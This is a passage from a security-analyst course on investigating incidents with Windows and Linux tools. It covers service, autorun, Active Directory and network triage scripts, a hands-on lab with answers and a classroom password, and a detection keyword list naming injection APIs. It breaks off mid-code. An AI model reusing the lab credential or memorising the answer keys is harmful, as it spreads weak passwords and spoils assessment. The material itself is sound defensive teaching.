suspicious service activity, however.

You can view running services in Task Manager, but Windows also comes with a Microsoft
Management Console (MMC) snap-in simply called Services.msc. This snap-in provides a list of all
active services, as well as details of each service, including a description of what it does. It also
enables you to start or stop a service. You can also view and enable/disable services from the
Services tab of the MSConfig utility, though this provides you with less detail about each service.
The shell command net start is another way to display all running services on the computer—this
lists their names without any further detail. The equivalent command in PowerShell is:
Get-Service | Where-Object {$_.Status -eq "Running"}
Although these tools can help you identify an unknown or suspicious service running on the
computer, they aren't particularly complex. A tool with a somewhat more robust feature set for
analysis is the Windows Task Scheduler. Task Scheduler not only enables you to create new tasks to
run at predefined times, but it also records the status of certain services. The properties dialog box
of each task includes a History tab that provides details of every time the service was started or
stopped or when it completed a particular action. This is essentially a version of Event Viewer for
that one task—you can see the time each action was recorded, its event ID, what kind of action it
took, and more. If a system service is acting strangely due to malicious tampering, you may be able
to more easily analyze its behavior using Task Scheduler. Task Scheduler may also be able to capture
the history of non-system services, like malware that installs itself as its own service.
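The Get-Service one-liner above only tells you which services are running. As an added example (not part of the course), the PowerShell below goes a step further on both points made in this section: it pulls each service's binary path from Win32_Service, checks the binary's Authenticode signature and location, and then reads the same event log that the Task Scheduler History tab displays. The folder list and the event IDs are assumptions stated in the comments.

```powershell
# Added example, not part of the course: service triage and Task Scheduler history
# from PowerShell. Win32_Service exposes the service binary path, which Get-Service
# does not; the binary is checked for a valid Authenticode signature and for an
# unusual location. Folder list and event IDs are assumptions noted below.
function Get-ServiceTriage {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        # PathName is either "C:\Program Files\X\svc.exe" -args or C:\Windows\svc.exe -k group.
        # An unquoted path with spaces will not resolve and is reported as PathNotFound,
        # which is itself worth a look (unquoted service path).
        $exe = if ($_.PathName -match '^"([^"]+)"')     { $Matches[1] }
               elseif ($_.PathName -match '^(\S+\.exe)') { $Matches[1] }
               else                                      { $_.PathName }
        $sig = if ($exe -and (Test-Path -LiteralPath $exe)) {
                   (Get-AuthenticodeSignature -FilePath $exe).Status
               } else { 'PathNotFound' }
        $usualPlace = ($exe -like "$env:SystemRoot\*") -or
                      ($exe -like "$env:ProgramFiles\*") -or
                      ($exe -like "${env:ProgramFiles(x86)}\*")
        [pscustomobject]@{
            Name       = $_.Name
            State      = $_.State
            StartMode  = $_.StartMode
            RunAs      = $_.StartName
            Executable = $exe
            Signature  = $sig
            # Unsigned, missing, or installed somewhere unusual: review it.
            Review     = ($sig -ne 'Valid') -or (-not $usualPlace)
        }
    }
}

# Task Scheduler's History tab reads the Microsoft-Windows-TaskScheduler/Operational
# log; it stays empty until task history is enabled in the Task Scheduler console.
# Event IDs (assumed from that log): 100 task started, 102 task completed,
# 129 task process created, 200 action started, 201 action completed.
function Get-TaskHistory {
    param([string]$TaskName = '*', [int]$MaxEvents = 500)

    $filter = @{ LogName = 'Microsoft-Windows-TaskScheduler/Operational'
                 Id      = 100, 102, 129, 200, 201 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # In these events the first property is the task path (assumption; check
            # the event XML in Event Viewer if your build differs).
            $task = [string]$_.Properties[0].Value
            if ($task -like $TaskName) {
                [pscustomobject]@{ Time = $_.TimeCreated; Id = $_.Id; Task = $task; Message = $_.Message }
            }
        }
}

Get-ServiceTriage | Where-Object Review |
    Format-Table Name, State, StartMode, RunAs, Signature, Executable -AutoSize
Get-TaskHistory | Select-Object -First 20 | Format-Table Time, Id, Task -AutoSize
```

Expect a few legitimate hits from third-party software installed outside Program Files; the combination to prioritise is a service whose binary is unsigned, starts automatically, and runs as LocalSystem.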

Figure 9-5: The history of a task in Task Scheduler.

Malware Analysis Tools for Windows

Although many of the previously mentioned tools can help you detect malware, specialized software
is required to actually analyze how malicious software functions and operates on a target system.
These tools can range from being relatively simple to operate, like malware scanners, to very
complex, like disassemblers. If you're interested in taking a deep dive into the inner workings of
malware, be prepared to learn low-level programming techniques.

There are several types of malware analysis tools, including:
• Anti-malware solutions. These solutions scan one or more systems in real time for the
presence of malware and can take action in response to detecting malware, like removing or
quarantining it. Anti-malware solutions can include everything from end-user software (often
called "antivirus" software, even though they can detect other types of malware) to more robust
enterprise solutions (e.g., endpoint detection and response [EDR]). Anti-malware solutions are
often the most basic line of defense against malware, though they are not the most thorough or
effective. Examples include:
    • Windows Security (also known as Microsoft Defender)
    • Malwarebytes Anti-Malware
    • Avast
    • AVG
• Crowd-sourced signature detection services. Some websites have been set up to receive
signature information from people and organizations, and then compile that information into a
public database. You can upload a file to the site, which analyzes the file for known malicious
signatures. The site might also show which anti-malware solutions mark the file as malicious
versus those that do not. The benefit of crowd sourcing signature detection is that security
professionals can collaborate to identify new malware as it arises rather than just relying on a
single source of information. Examples include:
    • VirusTotal (https://www.virustotal.com)
    • Hybrid Analysis (https://www.hybrid-analysis.com)
• Malware sandboxes. Sandboxing is a technique that isolates untrusted data in a closed virtual
environment to conduct tests and analyze the data for threats and vulnerabilities. Malware
sandboxes are common environments from which security practitioners examine malware and
how it operates without threatening actual hosts or the wider network. Examples include:
    • Cuckoo Sandbox
    • VirtualBox
    • VMware
    • Hyper-V
• Static malware analyzers. Various tools can provide a deeper look into malware than just a
signature. One common static analysis technique is to look for strings within a malware's
executable file. In this case, a string is any sequence of encoded characters that appears within
the executable file. So, a string analysis can reveal everything from variables the program is using
to API calls, and more. These strings may help you identify the nature or function of the
malware. Examples include:
    • Strings
    • findstr
• Reverse engineering tools. Reverse engineering is the process of analyzing a system's or
application's structure to reveal more about how it functions. In the case of malware, being able
to examine its base structure can provide you with information as to how the malware
propagates, what its primary directives are, and where it originated from. One of the most
common methods of reverse engineering is disassembly. A disassembler performs the reverse
engineering process of translating low-level machine language code into higher level assembly
language code. Examples include:
    • Interactive Disassembler (IDA) Pro
    • OllyDbg
    • WinDbg
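The string analysis and crowd-sourced lookup described in the list can both be started from PowerShell without any extra tooling. The block below is an added example (not part of the course and not the Sysinternals Strings utility): it implements the same ASCII and UTF-16 string extraction that Strings performs, computes the file's SHA-256 so it can be looked up on VirusTotal by hash before deciding whether to upload anything, and filters the strings for a short keyword list. The file path, minimum length and keyword list are assumptions.

```powershell
# Added example, not part of the course: a minimal "strings" in PowerShell, plus a
# SHA-256 so the file can be looked up on VirusTotal by hash. Looking up the hash
# first means a possibly sensitive or internal binary never leaves the organization;
# upload only if the hash is unknown. File path, minimum length and keyword list
# are assumptions.
function Get-FileStrings {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$MinLength = 4
    )
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    # Latin-1 maps every byte to exactly one char, so byte offsets and chars line up
    # and a run of bytes >= 0x80 cannot be mistaken for printable ASCII.
    $text = [System.Text.Encoding]::GetEncoding(28591).GetString($bytes)

    # Printable ASCII runs of at least $MinLength chars (what Strings -a reports).
    $ascii = [regex]::Matches($text, "[\x20-\x7E]{$($MinLength),}") |
        ForEach-Object { $_.Value }

    # UTF-16LE runs: printable char followed by a NUL byte. Most Windows API names,
    # registry paths and URLs inside PE files are stored this way (Strings -u).
    $unicode = [regex]::Matches($text, "(?:[\x20-\x7E]\x00){$($MinLength),}") |
        ForEach-Object { $_.Value -replace '\x00', '' }

    [pscustomobject]@{
        Path    = $Path
        SHA256  = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
        Ascii   = @($ascii)
        Unicode = @($unicode)
    }
}

# Substrings a responder typically looks for first in string output (assumed list).
$keywords = 'http://', 'https://', 'HKEY_', 'CurrentVersion\Run', 'cmd.exe', 'powershell',
            'VirtualAlloc', 'WriteProcessMemory', 'CreateRemoteThread', 'IsDebuggerPresent'

$result = Get-FileStrings -Path "$env:SystemRoot\System32\notepad.exe"
"SHA-256 for a hash lookup: $($result.SHA256)"
"$($result.Ascii.Count) ASCII strings, $($result.Unicode.Count) UTF-16 strings"
($result.Ascii + $result.Unicode) |
    Where-Object { $s = $_; $keywords | Where-Object { $s -like "*$_*" } } |
    Sort-Object -Unique
```

notepad.exe is used only as a harmless placeholder input; point the function at the file you are triaging. Strings are a lead, not a verdict: packed or obfuscated samples show almost none, which is itself a useful observation.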

Volatile Memory Analysis Tools for Windows

Random-access memory (RAM) is volatile, meaning that data written to it will not stay there very
long. Data temporarily written to RAM may be gone a fraction of a second after it's written, which
makes analysis of RAM difficult and complex. So, you'll need to use tools to image the memory for
static analysis. However, even the process of running a memory imaging tool can overwrite crucial
RAM sectors, so you should seek out tools that leave a very small memory footprint as part of their
execution. Some volatile memory imaging tools include Belkasoft Live RAM Capturer, MAGNET
RAM Capture, FTK Imager, and PMDump.
Note: Volatile data collection is discussed in more detail in the forensics lesson.

Once you've captured a RAM image, you can use an analysis tool to actually identify known
signatures. For example, you suspect that an attacker took control of one of your workstations and
initiated a Skype® chat from the computer. The contents of these communications might reveal
more about the attack or its perpetrator(s). A program like Skype writes a specific string to memory
before every message sent, so you could search for this string in your memory capture to more easily
identify where the messages reside.
Proprietary tools with this functionality include Belkasoft Evidence Center X and Forensic Toolkit.
Some freeware alternatives include WinDbg and Volatility. Volatility, in particular, has many
different modules for analyzing specific elements of memory. If you only want to retrieve a list of
DLLs used by processes in memory, you can run the dlllist module; if you want to see a history
of commands run at the command prompt, you can use the cmdscan module; and so on. Volatility
also has a GUI version called Volatility Workbench.

Figure 9-6: Using Volatility Workbench to analyze DLL history from a memory dump.


Active Directory Analysis Tools

Attackers targeting a Windows Active Directory® (AD) system may try to elevate access, create new
users, delete users, or use techniques like the golden ticket to exploit Kerberos. There are many tools
that can supplement the standard Active Directory MMC snap-ins by providing you with greater
monitoring and summary information so you can detect such attacks. For example, Active Directory
Explorer can list all objects within an Active Directory domain, as well as display the attributes for
each object in a detailed list. You can use Active Directory Explorer, available from the Sysinternals
suite, to examine what date and time an account was last changed; when the account's password was
last set; when the account was last logged on/off; and so on. This information can help you identify
unusual behavior or attributes that are configured with suspicious values.

Figure 9-7: Analyzing the attributes of an account using Active Directory Explorer.

Additionally, ManageEngine offers a full suite of freeware Active Directory tools called ADManager
Plus. The suite enables you to run queries on your Active Directory structure so that you can find
the values you're looking for; reports the last logon times of domain users; reports user accounts
with empty passwords; includes a password policy manager; and much more. Being able to retrieve
crucial summary information about the accounts and other objects in your domain will help you
identify anomalies and potential Active Directory–related incidents.
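As an added example (not from the course, ADManager Plus or Sysinternals), the following PowerShell pulls the same account attributes that Active Directory Explorer displays, for every enabled user, using the ActiveDirectory module that ships with RSAT, and flags the values a responder would question: passwords never set or not required, stale passwords, accounts created or changed in the last day, and protected-group membership. It assumes a domain-joined host with RSAT installed; the thresholds are assumptions.

```powershell
# Added example, not part of the course: the Active Directory Explorer attribute
# review done for all enabled users with the ActiveDirectory (RSAT) module.
# Assumes a domain-joined host with RSAT installed; thresholds are assumptions.
Import-Module ActiveDirectory

function Get-ADAccountReview {
    param(
        [int]$StalePasswordDays = 180,
        [int]$RecentChangeHours = 24
    )
    $now = Get-Date
    $props = 'whenCreated', 'whenChanged', 'pwdLastSet', 'PasswordLastSet', 'LastLogonDate',
             'PasswordNotRequired', 'PasswordNeverExpires', 'adminCount', 'memberOf'

    Get-ADUser -Filter 'Enabled -eq $true' -Properties $props | ForEach-Object {
        $reasons = @()
        # pwdLastSet of 0 means the password was never set or must change at next logon.
        if ($_.pwdLastSet -eq 0)     { $reasons += 'PasswordNeverSet' }
        if ($_.PasswordNotRequired)  { $reasons += 'PasswordNotRequired' }
        if ($_.PasswordNeverExpires) { $reasons += 'PasswordNeverExpires' }
        if ($_.PasswordLastSet -and ($now - $_.PasswordLastSet).TotalDays -gt $StalePasswordDays) {
            $reasons += 'StalePassword'
        }
        # Accounts created or modified while an incident is open are correlated
        # against the change logs; flag anything touched in the last day.
        if (($now - $_.whenCreated).TotalHours -lt $RecentChangeHours) { $reasons += 'RecentlyCreated' }
        if (($now - $_.whenChanged).TotalHours -lt $RecentChangeHours) { $reasons += 'RecentlyChanged' }
        # adminCount=1 marks current (or former) members of protected groups.
        if ($_.adminCount -eq 1)     { $reasons += 'ProtectedGroupMember' }

        [pscustomobject]@{
            SamAccountName  = $_.SamAccountName
            Created         = $_.whenCreated
            Changed         = $_.whenChanged
            PasswordLastSet = $_.PasswordLastSet
            LastLogonDate   = $_.LastLogonDate
            Groups          = ($_.memberOf | ForEach-Object { ($_ -split ',')[0] -replace '^CN=', '' }) -join ';'
            Reasons         = $reasons -join ','
        }
    }
}

Get-ADAccountReview | Where-Object Reasons | Sort-Object Changed -Descending |
    Format-Table SamAccountName, Created, Changed, PasswordLastSet, LastLogonDate, Reasons -AutoSize
```

LastLogonDate is derived from lastLogonTimestamp, which replicates only every 9 to 14 days by default, so treat it as approximate and query each domain controller's lastLogon attribute when the exact time matters.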

Network Analysis Tools for Windows

Aside from performing analysis on specific hosts, you can actively analyze your network
infrastructure using various tools available for Windows, many of which come with the OS by
default.
Note: Several of these tools have been discussed before, so you may wish to just briefly remind
students how they apply to network analysis rather than go into detail.

Tool         How It Applies to Network Analysis

Wireshark    As you've seen, Wireshark is a powerful packet analyzer. It can easily
             reveal to you anomalous behavior that may suggest an incident is taking
             place. Excessive packets sent from many sources to one destination could
             indicate a distributed denial of service (DDoS) attack; multiple IP
             addresses pointing to the same MAC address could indicate an Address
             Resolution Protocol (ARP) poisoning attack; you can inspect unencrypted
             packets for known malicious signatures or unauthorized information; and
             so on. Wireshark's user-friendly GUI and extensive feature set make it an
             ideal network analysis tool.

Nmap®        Nmap is another tool you've seen in action, but mostly from a
             reconnaissance point of view. Nmap can also aid you in analyzing your
             network by enumerating hosts. With enumeration, you can identify any
             rogue or otherwise unknown hosts attached to and transmitting on your
             network. You can also use Nmap to test how well your network firewalls
             and other defenses are able to block Internet Control Message Protocol
             (ICMP) and other types of traffic that Nmap uses to scan hosts.

Vistumbler   This is a wireless networking tool that maps and visualizes the wireless
             access points throughout a network. Vistumbler can make the task of
             detecting rogue access points much easier. In addition to Wi-Fi,
             Vistumbler can also be configured to collect data over GPS.

iPerf        This tool enables you to measure your network's bandwidth and packet
             loss by sending data streams between a client and server in the network.
             The streams use Transmission Control Protocol (TCP) and/or User
             Datagram Protocol (UDP), and you can configure them in a number of
             ways, including the size of UDP datagrams. Measuring bandwidth on the
             network can help you spot trouble areas where actual throughput is
             slower than acceptable levels, impacting your network's availability.

ipconfig     This command enables you to view IP address and Domain Name
             System (DNS) information on a host. This is a quick and easy way to get
             the networking information of a host you have access to. This is essential
             in taking inventory of known hosts to compare against any unknown
             hosts discovered in network enumeration. If a legitimate host has been
             compromised, you can also use ipconfig to see if its networking
             information has been altered, like its DNS lookup pointing to a malicious
             server rather than the organization's. This command comes with
             Windows.

netstat      Like ipconfig, this command can be used as a diagnostic tool to check a
             host's network information. In the case of netstat, it displays all
             network connections that the host is currently listening to. It provides
             information about the protocol used, the local host's address, the address
             it's listening to, and the state of the connection (as defined by RFC 793).
             Using this command can help you identify unknown or malicious sockets
             a host is connected to, as well as any errors in its routing tables. This
             command comes with Windows.

TCPView      This tool is part of the Sysinternals suite and shows information similar to
             netstat, but in a GUI. It also provides additional information about
             network connections, including creation time, number of sent packets,
             and more. TCPView provides a greater deal of interactivity through
             searching, sorting, and filtering operations.

nbtstat      This is another diagnostic tool. It displays a host's NetBIOS over TCP/IP
             information. Aside from local retrieval, you can also retrieve NetBIOS
             information from a remote host with the -a or -A flags. NetBIOS
             information can help you map a network by viewing a host's computer
             name and MAC address. If a particular NetBIOS entry appears faulty, it
             may indicate unauthorized changes to that host's network configurations.
             This command comes with Windows.

net          This command enables you to manage various network resources. For
             analysis purposes, net view and net use are the most relevant
             subcommands. The former subcommand provides you with a list of all
             hosts on a network that your interface can see, enabling you to spot rogue
             hosts. The latter subcommand displays information about the host's
             network connections. The net share and net file subcommands can
             also reveal network shares and files that the host is sharing. This
             command comes with Windows.

tracert      This command displays the route that packets take across a network to
             reach a given destination. It also provides information on delays that may
             occur as the packet traverses the route. If a tracert starts to time out at
             a certain node on the path, then it could indicate the last successful node
             is transmitting in error. It can also indicate the local host's routing tables
             have been corrupted in some way; if multiple hosts have their routes
             terminated at a specific IP address, then that IP address may be acting as
             a sinkhole to capture information. Even if requests don't time out, an
             unknown node along a path could be acting as a man in the middle,
             eavesdropping on traffic as it traverses the network. This command
             comes with Windows.

arp          This command enables you to view and manipulate the system's ARP
             cache. To view the cache on all interfaces, you need to use the -a flag,
             but you can also get more granular and specify which interface you want
             with the -N flag. Analyzing the system's ARP cache is a more direct way
             than Wireshark of detecting multiple IP addresses resolving to the same
             MAC address (in other words, ARP poisoning). This command comes
             with Windows.
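The netstat, TCPView and arp rows of the table describe checks that are easier to repeat and export when done with PowerShell's networking cmdlets. The block below is an added example (not part of the course): the first function joins each TCP connection to its owning process, as netstat -b and TCPView do, and the second groups the ARP cache by MAC address to surface the ARP-poisoning pattern the arp row describes. It needs only a standard Windows 10 host; the filters at the bottom are assumptions for this example.

```powershell
# Added example, not part of the course: the netstat -ab / TCPView and arp -a checks
# from the table, done with the NetTCPIP cmdlets so the results are objects that can be
# filtered, sorted and exported. Filters at the bottom are assumptions.
function Get-ConnectionTriage {
    # Map each connection to its owning process, as netstat -b and TCPView do.
    $byPid = @{}
    Get-Process | ForEach-Object { $byPid[$_.Id] = $_ }

    Get-NetTCPConnection | ForEach-Object {
        $proc = $byPid[[int]$_.OwningProcess]
        $name = if ($proc) { $proc.ProcessName } else { '<exited or access denied>' }
        [pscustomobject]@{
            Local   = "$($_.LocalAddress):$($_.LocalPort)"
            Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
            State   = $_.State
            Created = $_.CreationTime
            PID     = $_.OwningProcess
            Process = $name
            Path    = $proc.Path
        }
    }
}

function Find-DuplicateMacNeighbors {
    # One MAC answering for several IPs on one interface is the ARP-poisoning pattern
    # the table describes (typically the gateway's IP plus the attacker's own).
    # Broadcast, multicast and incomplete entries are excluded first.
    Get-NetNeighbor -AddressFamily IPv4 |
        Where-Object {
            $_.State -in @('Reachable', 'Stale', 'Permanent', 'Delay', 'Probe') -and
            $_.LinkLayerAddress -and
            $_.LinkLayerAddress -notin @('00-00-00-00-00-00', 'FF-FF-FF-FF-FF-FF') -and
            $_.IPAddress -notmatch '^(2(2[4-9]|3[0-9])\.|255\.255\.255\.255$)'
        } |
        Group-Object InterfaceIndex, LinkLayerAddress |
        Where-Object Count -gt 1 |
        ForEach-Object {
            [pscustomobject]@{
                InterfaceIndex = $_.Group[0].InterfaceIndex
                MAC            = $_.Group[0].LinkLayerAddress
                IPAddresses    = ($_.Group.IPAddress -join ', ')
            }
        }
}

# Established connections to non-loopback peers, newest first (the putty.exe
# session in the activity below would appear here with remote port 22).
Get-ConnectionTriage |
    Where-Object { $_.State -eq 'Established' -and $_.Remote -notlike '127.*' -and $_.Remote -notlike '::1:*' } |
    Sort-Object Created -Descending | Format-Table Local, Remote, State, PID, Process, Path -AutoSize

# Listening sockets owned by a process outside the Windows folder.
Get-ConnectionTriage |
    Where-Object { $_.State -eq 'Listen' -and $_.Path -and $_.Path -notlike "$env:SystemRoot\*" } |
    Format-Table Local, PID, Process, Path -AutoSize

Find-DuplicateMacNeighbors | Format-Table -AutoSize
```

Some duplicate-MAC results are legitimate (a router that owns several addresses, or a virtualization host answering for its guests), so confirm against the known inventory before treating a hit as poisoning; a duplicate that includes the default gateway's IP is the one to act on first.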


ACTIVITY 9-1
Analyzing Incidents with Windows-Based Tools

Data Files
C:\CNX0013Data\Performing Active Asset and Network Analysis\putty.exe
C:\CNX0013Data\Performing Active Asset and Network Analysis\ProcessExplorer\procexp.exe

Before You Begin
You'll be using your Windows 10 client for this activity. You'll be using the Windows-based Secure
Shell (SSH) client PuTTY to open a shell onto your server. You'll also run Process Explorer, a tool
that does not come with Windows but is available for download from Microsoft's website.

Scenario
In your domain, you monitor the security of Develetech's Windows 10 workstations. These
computers are under constant threat of compromise through malware and other malicious activity.
Therefore, you need to use the tools at your disposal to more easily detect an incident when it
occurs.

First, you'll retrieve networking information using ipconfig to get a more accurate picture of how
the workstations communicate. You'll examine how sessions like SSH connections can be
monitored using the netstat command.
Then, you'll take a more detailed look at the running processes on your workstations using Process
Explorer. Process Explorer can reveal much about a process's behavior, including how it interfaces
with the Windows Registry.
Finally, you'll inspect the Registry using Registry Editor to get a better idea of how certain programs
are using the Windows architecture. Using these various Windows-based tools will ensure your user
workstations are continuously monitored for incidents.

1. Examine the ipconfig options.
a) On your Windows 10 desktop, right-click the Start button and select Windows PowerShell (Admin).
b) At the prompt, enter ipconfig /?
c) Examine the various options for ipconfig.

2. How would you renew a Dynamic Host Configuration Protocol (DHCP) lease
on your Ethernet adapter?
A: ipconfig /renew Ethernet

3. List all of your active network adapters.
a) Enter ipconfig /all
b) Note all of the active network adapters.
Note: Ensure students leave this prompt open for the next step.

4. What is the default gateway for your Ethernet adapter?
A: 10.39.5.1

5. What is the DNS address for your Ethernet adapter?
A: 10.39.5.#, where # is the student's Windows Server IP address.
Note: The answer to this question will need to change if your classroom network is different than
what's detailed in the course setup.

6. Initiate an SSH session from your Windows 10 client to your Windows Server®.
a) From the course data files, open putty.exe.
b) In the Host Name (or IP address) field, type your Windows Server's IP address.
c) Verify the SSH radio button is selected and select Open.
d) In the PuTTY Security Alert dialog box, select Accept to trust the connection.
e) At the login prompt, enter Administrator
f) At the password prompt, enter Pa22w0rd
g) Verify that you're given a shell onto the server.

7. In PowerShell, run netstat to view all open connections.
a) Switch back to Windows PowerShell.
b) Enter netstat /?
c) Note the various options available for this command.
d) Enter netstat -ab
It will take a few moments for the scan to run.

8. What do the -a and -b flags do in netstat?
A: The -a flag shows all connections and listening ports, and the -b flag shows the executables
associated with each connection.

9. Examine how netstat lists the open SSH connection.
a) Look for the entry concerning putty.exe.

10. What does the status show for that connection?
A: ESTABLISHED

11. Examine how netstat lists a recently closed SSH session.
a) Switch back to your PuTTY connection and enter exit to close the session.
b) Return to the netstat list.
c) Enter netstat -n and note the state of the connection with a foreign port of 22 (SSH).
The state of the connection is now TIME_WAIT. This indicates the connection has been closed by
the local host, but it is still sending and receiving any packets that may have been delayed. The
connection will terminate completely in a few moments.
Note: If students don't run the netstat -n command quickly enough after exiting PuTTY, they may
not see the TIME_WAIT entry.

12. Use Process Explorer to view details about running processes on the system.
a) From the course data files, right-click procexp64.exe and select Run as administrator.
b) In the Process Explorer License Agreement dialog box, select Agree.
c) Verify that you can see the various processes running on your Windows 10 system.
d) In the Process Explorer window, from the menu, select View→Show Lower Pane.
e) Select View→Lower Pane View→DLLs.
f) In the upper pane, select the Company Name column to sort by that field.
g) Identify any unusual process that is running.
Most of the processes on the server are from Microsoft or some other known third-party entity, but
one process, obscura.exe, claims to be from Develetech.
h) Select the obscura.exe entry.
i) Verify that there are a large number of active DLLs used by this process.
Note: If students prefer, have them examine a different running process for the following steps.
They can also open a new program and examine its processes.

13. Upload the obscura.exe process signature to VirusTotal.
a) Right-click obscura.exe and select Check VirusTotal.
b) When a browser window opens, return to Process Explorer and select Yes to agree to the licensing
terms, then select OK.
Note: Students only need to agree to the licensing terms once, so if they close and reopen Process
Explorer, they won't get prompted again.
c) In Process Explorer, in the VirusTotal column, select the number link to open the file's page on
VirusTotal.
d) Verify that some of the anti-malware solutions tracked by VirusTotal consider this malware.
e) Select the DETAILS tab, then scroll down to the File Version Information section.
f) Scroll down, and under the File Version Information section, verify that the Obscura executable is
not signed.
The file is not actually malicious, but it does exhibit unusual behavior. It's a good idea to remove it,
or at least learn more about what it does.

14. Identify a Registry key used by the Obscura process.
a) Close any open browser windows.
b) In Process Explorer, with obscura.exe still selected, select View→Lower Pane View→Handles.
c) Verify that there are various types of handles: Desktop, Event, File, Key, and more.
d) Look for the key value with the Registry path HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
Note: If necessary, sort by Type and focus on Key entries.
e) Double-click the key and then copy it from the Name text box.
f) Select OK to close the dialog box.

15. View the key's details in the Windows Registry.
a) Select the Windows 10 Start button and type regedit
b) Select Registry Editor from the results.
c) In the Registry Editor window, in the address bar, replace the existing text and paste the key path
you copied.
d) Press Enter to navigate to that key.
Note: Ensure that students don't modify other aspects of the Registry unless they know what they're
doing.
Note: The list of Registry values in the screenshot may not exactly align with what students see,
depending on the hardware drivers that are installed on their systems.
e) Verify that this key includes several values, including a path to the obscura.exe file. This Registry
key is used to automatically start processes when the system starts, so that means the unknown
process will continue to run even after restarting the server.
f) Right-click the obscura entry in the Registry and select Delete.
g) Select Yes to confirm.
h) Close Registry Editor.
i) Wait about 10 seconds and look for the Obscura.txt file to appear on the desktop.
j) Open the file and verify that it says the Obscura process was revealed.
k) Return to Process Explorer, right-click obscura.exe, and select Kill Process. Select OK to confirm.
l) Verify that the obscura.exe entry disappears from Process Explorer.
m) Delete Obscura.txt from the desktop.

16. How could these tools help you discover and deal with malware?
A: Answers will vary. The netstat command can enable you to find any open or recently closed
network connections that are either malicious or being used in an insecure way. Process Explorer
enables you to find suspicious processes and see how they interface with system DLLs and the
Windows Registry. Registry Editor enables you to further identify a suspicious program's
configuration details, including any changes to the less visible components of the operating
system. With any tool, you need a good working knowledge of Windows' normal operation to
make educated decisions about what is and is not malware.

17. Close Process Explorer and Windows PowerShell.
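Steps 14 and 15 found one autorun entry by following a single process's handles. The same check can be run the other way round, starting from the Registry, for every Run and RunOnce key on the machine and in the current user's hive. The block below is an added example (not part of the course): it reads each value, extracts the executable it launches, and reports the binary's Authenticode signature, so an unsigned or missing autorun binary stands out. The key list is an assumption for this example.

```powershell
# Added example, not part of the course: the autorun check from steps 14 and 15
# performed for every Run/RunOnce key. Key list is an assumption.
function Get-RunKeyEntries {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
        # Get-ItemProperty returns each value as a property, alongside PS* metadata
        # properties (PSPath, PSChildName, ...) that are skipped here.
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }
            $command = [string]$prop.Value
            # Quoted path, or first token ending in .exe; anything else (rundll32
            # arguments, script hosts) is kept as the first token for review.
            $exe = if ($command -match '^"([^"]+)"')      { $Matches[1] }
                   elseif ($command -match '^(\S+\.exe)')  { $Matches[1] }
                   else                                    { ($command -split ' ')[0] }
            $exe = [Environment]::ExpandEnvironmentVariables($exe)
            $sig = if ($exe -and (Test-Path -LiteralPath $exe)) {
                       (Get-AuthenticodeSignature -FilePath $exe).Status
                   } else { 'PathNotFound' }
            [pscustomobject]@{
                Key        = $key
                ValueName  = $prop.Name
                Command    = $command
                Executable = $exe
                Signature  = $sig
            }
        }
    }
}

# A signature other than Valid is the first cut. A missing path usually means a
# stale entry from an uninstalled program, but can also mean a dropper that removed
# itself; either way the value is worth understanding before it is deleted.
Get-RunKeyEntries | Sort-Object Signature |
    Format-Table Signature, ValueName, Executable, Key -AutoSize
```

Record the full Command value before deleting an entry, as the activity does by copying the key path; it is the evidence that ties the persistence mechanism to the file you examined in Process Explorer.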



TOPIC B
Analyze Incidents with Linux-Based Tools
Just like with Windows, some analysis tools target Linux distributions specifically. Some tools are
even cross-platform. In this topic, you'll use both in a Linux environment.

e
File System Analysis Tools for Linux

Linux comes with several tools to aid in analyzing a file system. One such tool is lsof, which
retrieves a list of all files currently open on the OS. This can be everything from a regular text file
open in a text editor to a network socket, and much more. Basically, any resource that is currently
active will be displayed when using the lsof command. Although the output of lsof can be
customized, it typically provides for each file:

• The process ID for the process that has the file open.

• The owner of the process.
• The size of the file.

• The file's local or network address.
• The file's TCP state, if applicable.
• The file's access mode.

The power of lsof for file analysis is that you can quickly get a list of all resources a process is
currently using, which can come in handy in identifying malicious processes that are using too many
resources or resources they should not have access to. You can also go the other way and identify
malicious resources that are using specific processes. If you have a file name or process ID that you
want to look for specifically, you can also tell lsof to retrieve just those results. For example, if you
want to retrieve all files open by the root user that are being used by process ID 533, you'd enter
lsof -u root -a -p 533. In this case, the -a option ANDs the two selections together, so only files
that match both the user and the process ID are listed.
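To show how the lsof fields listed above feed a triage check, here is an added example (not part of the course) that parses constructed `lsof -nP -i` output, reproduces the `-u USER -a -p PID` selection in Python, and compares listening sockets against an assumed baseline of expected services; the sample output, PIDs, addresses and baseline are all constructed.

```python
"""Triage of `lsof` network-socket output (added example): reproduce the
`-u USER -a -p PID` selection in Python and flag listening sockets that are not
in an assumed baseline of expected services."""
import re
from dataclasses import dataclass

# Constructed sample of `lsof -nP -i` output; commands, PIDs and addresses are made up.
SAMPLE_LSOF = """\
COMMAND   PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      812     root    3u  IPv4  20115      0t0  TCP *:22 (LISTEN)
nginx    1044 www-data    6u  IPv4  22310      0t0  TCP *:80 (LISTEN)
nginx    1044 www-data    7u  IPv4  22311      0t0  TCP *:443 (LISTEN)
cupsd     901     root    8u  IPv4  24001      0t0  TCP 127.0.0.1:631 (LISTEN)
python3   533     root    4u  IPv4  30211      0t0  TCP *:8081 (LISTEN)
python3   533     root    5u  IPv4  30212      0t0  TCP 10.0.0.5:44812->203.0.113.7:8443 (ESTABLISHED)
"""

# Assumed baseline: (command, listening port) pairs this host is expected to expose.
EXPECTED_LISTENERS = {("sshd", 22), ("nginx", 80), ("nginx", 443), ("cupsd", 631)}


@dataclass
class OpenFile:
    command: str
    pid: int
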